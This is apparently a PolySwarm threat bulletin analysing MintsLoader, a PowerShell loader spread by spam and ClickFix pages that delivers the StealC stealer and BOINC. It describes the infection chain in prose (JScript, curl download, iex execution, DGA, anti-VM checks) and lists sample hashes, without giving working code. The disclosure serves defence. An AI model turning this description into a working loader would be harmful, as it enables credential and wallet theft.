The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

MintsLoader Delivering StealC and BOINC

Jan 31, 2025 12:35:53 PM / by The Hivemind

MINTSLOADERVerticals Targeted: Oil & Gas, Energy, Legal Services 

Executive Summary

MintsLoader, a PowerShell-based loader, was recently observed delivering StealC and BOINC.

Key Takeaways

  • MintsLoader, a PowerShell-based loader, was recently observed delivering StealC and BOINC.
  • In this ongoing campaign, MintsLoader is being delivered via spam emails that link to a Kongtuke/ClickFix page or a JScript file.
  • MintsLoader uses a domain generation algorithm (DGA) as well as anti-VM measures in an effort to evade detection and analysis. 

What is MintsLoader?

MintsLoader, a PowerShell-based loader, was recently observed delivering StealC and BOINC. The campaign has targeted entities in the energy, oil & gas (ONG), and legal services verticals. Targets have been located in the US and Europe. eSentire reported on this activity. 

In early January 2025, eSentire researchers observed a campaign leveraging MintsLoader to deliver StealC and the Berkeley Open Infrastructure for Network Computing (BOINC) client. In this ongoing campaign, the PowerShell-based MintsLoader is being delivered via spam emails that link to a Kongtuke/ClickFix page or a JScript file. 

The infection chain begins when a user clicks the link in the spam email that downloads a JScript file. Following a 13 second sleep, a WScript.Shell object is instantiated. Next, the Run method is called to execute the loader’s first command in PowerShell. The command uses curl to retrieve MintsLoader’s first stage. The script deletes itself on exit, in an effort to hinder analysis. 

The MintsLoader C2 issues an obfuscated response, more PowerShell, which uses iex to execute the next stage, which is also obfuscated. Once deobfuscated, the script checks for the presence of a virtual machine. MintsLoader uses a domain generation algorithm (DGA) as well as anti-VM measures in an effort to evade detection and analysis. The final PowerShell stage of the sample from eSentire’s analysis results in the delivery of the stealer malware StealC, although some samples also reportedly delivered BOINC. 

What is StealC?

StealC is an information stealer malware written in C that surfaced in 2023, drawing inspiration from other notable stealers like Raccoon and Redline. It is designed to harvest sensitive data, such as credentials and cryptocurrency wallets, from infected machines.

What is BOINC?

Berkeley Open Infrastructure for Network Computing (BOINC) is not malicious, in and of itself. It is typically used for volunteer computing projects. It has been observed in this campaign as an unusual secondary payload, suggesting the threat actors behind this campaign may exploit its resource-intensive functionality for unauthorized purposes.

IOCs

PolySwarm has multiple samples associated with this campaign.

 

B8804a7ef09a9c1e8ede3a86a087b754b42f5b37c6de1e82c86f38d01c297ee2 (MintsLoader)

138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa (StealC)

91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3 (BOINC)

 

You can use the following CLI command to search for all samples of a particular malware family in our portal:

$ polyswarm link list -f MalwareFamily

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 

Topics: Threat Bulletin, Loader, MintsLoader, BOINC, StealC

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts

Join the Marketplace

For Enterprises and Businesses

Learn More

For Security Experts and AV Companies

Learn More